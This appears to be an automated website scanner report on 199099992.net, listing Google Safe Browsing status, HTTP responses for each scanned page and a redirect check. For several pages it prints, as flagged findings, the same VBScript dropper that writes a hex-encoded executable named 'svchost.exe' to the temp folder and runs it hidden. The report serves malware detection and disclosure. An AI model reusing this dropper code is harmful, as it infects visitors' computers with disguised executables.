Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=199099992.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.199099992.net/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:32:26 GMT Accept-Ranges: bytes ETag: "a98af589402bd01:155f" Server: Microsoft-IIS/6.0 Content-Length: 18299 Content-Location: http://www.199099992.net/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 12:42:18 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/index.html | 200 OK Content-Length: 18299 Content-Type: text/html | clean |
http://www.199099992.net/skin/tupian/qq.js | 200 OK Content-Length: 4289 Content-Type: application/x-javascript | clean |
http://www.199099992.net/lxwm/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:32:31 GMT Accept-Ranges: bytes ETag: "deed4d777194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121217 Content-Location: http://www.199099992.net/lxwm/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:42:07 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/lxwm/index.html | 200 OK Content-Length: 121217 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/about | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:32:35 GMT Location: http://www.199099992.net/about/ Server: Microsoft-IIS/6.0 Content-Length: 154 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/about/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:32:37 GMT Accept-Ranges: bytes ETag: "c8f05d4d7194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 122486 Content-Location: http://www.199099992.net/about/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:40:56 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/about/index.html | 200 OK Content-Length: 122486 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/news | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:32:41 GMT Location: http://www.199099992.net/news/ Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/news/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:32:42 GMT Accept-Ranges: bytes ETag: "83bff68d402bd01:155f" Server: Microsoft-IIS/6.0 Content-Length: 16332 Content-Location: http://www.199099992.net/news/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 12:42:25 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/news/index.html | 200 OK Content-Length: 16332 Content-Type: text/html | clean |
http://www.199099992.net/cpzx | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:32:45 GMT Location: http://www.199099992.net/cpzx/ Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/cpzx/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:32:47 GMT Accept-Ranges: bytes ETag: "a2435b507194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 124938 Content-Location: http://www.199099992.net/cpzx/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:41:01 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/cpzx/index.html | 200 OK Content-Length: 124938 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/job | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:32:52 GMT Location: http://www.199099992.net/job/ Server: Microsoft-IIS/6.0 Content-Length: 152 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/job/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:32:53 GMT Accept-Ranges: bytes ETag: "5a1636777194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120413 Content-Location: http://www.199099992.net/job/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:42:06 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/job/index.html | 200 OK Content-Length: 120413 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/lxwm | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:32:58 GMT Location: http://www.199099992.net/lxwm/ Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.199099992.net/dlhz | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:33:00 GMT Location: http://www.199099992.net/dlhz/ Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/dlhz/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:01 GMT Accept-Ranges: bytes ETag: "9cac79567194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120573 Content-Location: http://www.199099992.net/dlhz/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:41:12 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/dlhz/index.html | 200 OK Content-Length: 120573 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/fw | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:33:06 GMT Location: http://www.199099992.net/fw/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/fw/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:07 GMT Accept-Ranges: bytes ETag: "227a19777194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120706 Content-Location: http://www.199099992.net/fw/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:42:06 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/fw/index.html | 200 OK Content-Length: 120706 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/khal | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 15:33:12 GMT Location: http://www.199099992.net/khal/ Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.199099992.net/khal/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:13 GMT Accept-Ranges: bytes ETag: "1c242777194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120362 Content-Location: http://www.199099992.net/khal/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:42:07 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/khal/index.html | 200 OK Content-Length: 120362 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/cpzx/c1/s2/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:18 GMT Accept-Ranges: bytes ETag: "e8ac1c4e7194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121128 Content-Location: http://www.199099992.net/cpzx/c1/s2/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:40:57 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/cpzx/c1/s2/index.html | 200 OK Content-Length: 121128 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/cpzx/c1/2/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:23 GMT Accept-Ranges: bytes ETag: "eb4814d7194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121136 Content-Location: http://www.199099992.net/cpzx/c1/2/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:40:56 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/cpzx/c1/2/index.html | 200 OK Content-Length: 121136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/cpzx/c1/3/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:27 GMT Accept-Ranges: bytes ETag: "8c13c24d7194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121642 Content-Location: http://www.199099992.net/cpzx/c1/3/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:40:57 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/cpzx/c1/3/index.html | 200 OK Content-Length: 121642 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.199099992.net/cpzx/c1/4/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 15:33:32 GMT Accept-Ranges: bytes ETag: "5c26d54d7194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121058 Content-Location: http://www.199099992.net/cpzx/c1/4/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:40:57 GMT X-Powered-By: ASP.NET | clean |
http://www.199099992.net/cpzx/c1/4/index.html | 200 OK Content-Length: 121058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 199099992.net
Result:
GET / HTTP/1.1
Host: 199099992.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 199099992.net
Referer: http://www.google.com/search?q=199099992.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 199099992.net
Referer: http://www.google.com/search?q=199099992.net
Result:
The result is similar to the first query. There are no suspicious redirects found.